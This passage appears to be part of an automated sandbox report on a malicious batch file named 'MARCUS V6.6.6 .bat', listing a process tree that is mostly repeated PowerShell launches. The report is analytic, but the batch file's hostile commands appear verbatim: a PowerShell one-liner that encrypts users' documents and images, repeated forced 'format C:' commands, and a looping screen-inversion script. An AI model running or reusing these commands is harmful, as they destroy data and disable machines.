                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5992
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6204
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6328
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6464
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6588
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6728
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6856
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6992
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7132
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6576
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6976
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6964
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7304
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7472
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7624
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7752
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7892
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8028
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8160
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7268
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7736
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8112
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7720
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8212
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8344
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8476
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8604
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8736
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8864
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9000
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9148
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8308
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:7968
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9020
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8584
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:8716
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9320
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9452
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9596
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9764
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9904
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:10032
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:10164
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9416
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9756
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:10160
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:9392
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:10268
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:10400
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:10528
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:10664
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:10804
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:10936
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:11068
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:11204
                                                                                                      • C:\Windows\system32\wermgr.exe
                                                                                                        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "11204" "1876" "1792" "1880" "0" "0" "1884" "0" "0" "0" "0" "0"
                                                                                                        4⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:10384
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
                                                                                                  1⤵
                                                                                                    PID:9584
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 1250
                                                                                                      2⤵
                                                                                                        PID:10396
                                                                                                      • C:\Windows\system32\mode.com
                                                                                                        mode 85,30
                                                                                                        2⤵
                                                                                                          PID:11108
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -c "$klucz=New-Object Byte[] 32; (New-Object Security.Cryptography.RNGCryptoServiceProvider).GetBytes($klucz); ls C:\Users -Recurse -Include *.doc,*.xls,*.jpg | % { [IO.File]::WriteAllBytes($_.FullName+'.MAGNUS', (New-Object Security.Cryptography.AesManaged).CreateEncryptor().TransformFinalBlock([IO.File]::ReadAllBytes($_),0,$_.Length) }"
                                                                                                          2⤵
                                                                                                            PID:11256
                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                          1⤵
                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          PID:3800
                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                          werfault.exe /h /shared Global\cdffd5b55a98432da6ea9da6b95c1e9d /t 3912 /p 4436
                                                                                                          1⤵
                                                                                                            PID:1568
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                            1⤵
                                                                                                            • Enumerates system info in registry
                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                            PID:472
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff2496dcf8,0x7fff2496dd04,0x7fff2496dd10
                                                                                                              2⤵
                                                                                                                PID:9072
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:2
                                                                                                                2⤵
                                                                                                                  PID:9192
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:3
                                                                                                                  2⤵
                                                                                                                    PID:7724
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2436,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2604 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:2272
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:6048
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:6056
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3844 /prefetch:2
                                                                                                                          2⤵
                                                                                                                            PID:4216
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:6812
                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                            1⤵
                                                                                                                              PID:8316
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
                                                                                                                              1⤵
                                                                                                                                PID:7248
                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                  chcp 1250
                                                                                                                                  2⤵
                                                                                                                                    PID:8020
                                                                                                                                  • C:\Windows\system32\mode.com
                                                                                                                                    mode 85,30
                                                                                                                                    2⤵
                                                                                                                                      PID:7200
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                      2⤵
                                                                                                                                        PID:7264
                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                        2⤵
                                                                                                                                          PID:7596
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                          2⤵
                                                                                                                                            PID:7856
                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                            2⤵
                                                                                                                                              PID:7792
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                              2⤵
                                                                                                                                                PID:7424
                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                2⤵
                                                                                                                                                  PID:8176
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:7612
                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                    2⤵
                                                                                                                                                      PID:6304
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:8132
                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                        2⤵
                                                                                                                                                          PID:7288
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:8396
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aj035jz\0aj035jz.cmdline"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:8756
                                                                                                                                                          • C:\Windows\System32\cmd.exe
